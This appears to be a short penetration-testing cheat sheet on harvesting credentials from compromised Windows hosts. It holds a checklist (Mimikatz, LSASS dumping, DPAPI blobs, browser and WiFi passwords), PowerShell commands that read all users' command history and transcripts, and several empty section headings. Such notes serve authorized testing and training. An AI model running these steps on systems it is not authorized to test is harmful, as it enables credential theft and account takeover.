Credential Harvesting {} Post Exploitation

By l1nuxkid

Checklist (Run First)

  • Run LaZagne / winPEAS

  • Check PowerShell history (all users)

  • Run Mimikatz — logonpasswords + SAM

  • Dump LSASS

  • Search for .kdbx / .kdb .ibd files

  • Check AutoLogon registry keys

  • Check cmdkey /list (stored creds)

  • Hunt config / xml / ini / env files

  • Check AppData Credentials folder (DPAPI blobs)

  • Run Snaffler on AD file shares

  • Check WiFi profiles

  • Check browser saved passwords

PowerShell History

# Get history file path
(Get-PSReadlineOption).HistorySavePath

# Read it
cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# All users
foreach($user in ((ls C:\users).fullname)){
    cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue
}

# Transcripts
gci C:\ -Recurse -Force -ErrorAction SilentlyContinue -Filter *transcript*.txt
type C:\Users\Public\Transcripts\transcript01.txt

DPAPI / Stored Credentials

WinRM sessions can't decrypt DPAPI blobs — need an interactive logon. Use RunasCs.

DPAPI Credential Blob Locations

Registry Hunting

  • AutoLogon Credentials

  • Application Credentials

SessionGopher — PuTTY / WinSCP / RDP / FileZilla

File System Searching

XAMPP / Web App Configs

KeePass Cracking

Browser & Application Creds

Chrome/Edge

Automated Tools

Last updated